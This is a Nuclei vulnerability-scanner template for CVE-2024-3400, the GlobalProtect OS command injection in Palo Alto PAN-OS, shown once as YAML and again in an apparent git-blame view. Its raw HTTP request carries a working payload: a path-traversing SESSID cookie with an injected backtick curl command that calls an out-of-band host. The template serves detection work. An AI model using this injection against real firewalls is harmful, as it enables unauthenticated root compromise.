nuclei-templates/http/cves/2024/CVE-2024-3400.yaml

id: CVE-2024-3400

info:
  name: GlobalProtect - OS Command Injection
  author: pdresearch,parthmalhotra
  severity: critical
  description: |
    A command injection vulnerability in the GlobalProtect feature of Palo Alto Networks PAN-OS software for specific PAN-OS versions and distinct feature configurations may enable an unauthenticated attacker to execute arbitrary code with root privileges on the firewall.Cloud NGFW, Panorama appliances, and Prisma Access are not impacted by this vulnerability.
  reference:
    - https://labs.watchtowr.com/palo-alto-putting-the-protecc-in-globalprotect-CVE-2024-3400/
    - https://github.com/fkie-cad/nvd-json-data-feeds
    - https://github.com/k4nfr3/nmap-scripts
    - https://github.com/0x0d3ad/CVE-2024-3400
    - https://github.com/FoxyProxys/CVE-2024-3400
    - https://github.com/MrR0b0t19/CVE-2024-3400
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
    cvss-score: 10
    cve-id: CVE-2024-3400
    cwe-id: CWE-77
    epss-score: 0.00371
    epss-percentile: 0.72356
    cpe: cpe:2.3:o:paloaltonetworks:pan-os:10.2.0:*:*:*:*:*:*:*
  metadata:
    vendor: paloaltonetworks
    product: pan-os
    fofa-query: icon_hash="-631559155"
  tags: kev,cve,globalprotect,pan-os,rce,cve2024

http:
  - raw:
      - |
        GET /global-protect/login.esp HTTP/1.1
        Host: {{Hostname}}
        Cookie: SESSID=/../../../opt/panlogs/tmp/device_telemetry/minute/hellothere226`curl${IFS}{{interactsh-url}}`;

    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol
        words:
          - "http"

      - type: word
        part: body
        words:
          - "GlobalProtect"
Create CVE-2024-3400.yaml 2024-04-16 15:37:09 +00:00			`id: CVE-2024-3400`

			`info:`
			`name: GlobalProtect - OS Command Injection`
remove spacing 2024-04-16 15:40:35 +00:00			`author: pdresearch,parthmalhotra`
Create CVE-2024-3400.yaml 2024-04-16 15:37:09 +00:00			`severity: critical`
remove spacing 2024-04-16 15:40:35 +00:00			`description: \|`
Create CVE-2024-3400.yaml 2024-04-16 15:37:09 +00:00			`A command injection vulnerability in the GlobalProtect feature of Palo Alto Networks PAN-OS software for specific PAN-OS versions and distinct feature configurations may enable an unauthenticated attacker to execute arbitrary code with root privileges on the firewall.Cloud NGFW, Panorama appliances, and Prisma Access are not impacted by this vulnerability.`
			`reference:`
			`- https://labs.watchtowr.com/palo-alto-putting-the-protecc-in-globalprotect-CVE-2024-3400/`
			`- https://github.com/fkie-cad/nvd-json-data-feeds`
			`- https://github.com/k4nfr3/nmap-scripts`
			`- https://github.com/0x0d3ad/CVE-2024-3400`
			`- https://github.com/FoxyProxys/CVE-2024-3400`
			`- https://github.com/MrR0b0t19/CVE-2024-3400`
			`classification:`
			`cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H`
			`cvss-score: 10`
			`cve-id: CVE-2024-3400`
			`cwe-id: CWE-77`
			`epss-score: 0.00371`
			`epss-percentile: 0.72356`
			`cpe: cpe:2.3:o:paloaltonetworks:pan-os:10.2.0:::::::*`
			`metadata:`
			`vendor: paloaltonetworks`
			`product: pan-os`
			`fofa-query: icon_hash="-631559155"`
			`tags: kev,cve,globalprotect,pan-os,rce,cve2024`

			`http:`
			`- raw:`
			`- \|`
			`GET /global-protect/login.esp HTTP/1.1`
			`Host: {{Hostname}}`
			Cookie: SESSID=/../../../opt/panlogs/tmp/device_telemetry/minute/hellothere226`curl${IFS}{{interactsh-url}}`;

			`matchers-condition: and`
			`matchers:`
			`- type: word`
			`part: interactsh_protocol`
			`words:`
			`- "http"`

			`- type: word`
			`part: body`
			`words:`
			`- "GlobalProtect"`